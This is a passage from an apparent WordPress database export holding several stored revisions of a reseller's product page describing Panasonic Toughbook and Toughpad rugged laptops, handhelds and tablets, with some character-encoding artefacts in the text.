you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:47:34','2018-12-21 01:47:34','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2682,1,'2018-12-21 09:48:46','2018-12-21 01:48:46','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:48:46','2018-12-21 01:48:46','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2683,1,'2018-12-21 09:49:08','2018-12-21 01:49:08','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" 